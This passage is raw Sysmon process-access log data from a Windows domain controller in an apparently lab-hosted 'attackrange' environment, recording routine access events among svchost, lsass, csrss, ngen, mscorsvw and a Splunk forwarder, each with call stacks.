10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.627{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.002{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C7-6005-3D01-00000000A301}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.002{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90C7-6005-3D01-00000000A301}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:39.002{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C7-6005-3D01-00000000A301}5112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CC-6005-3F01-00000000A301}2368C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:44.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 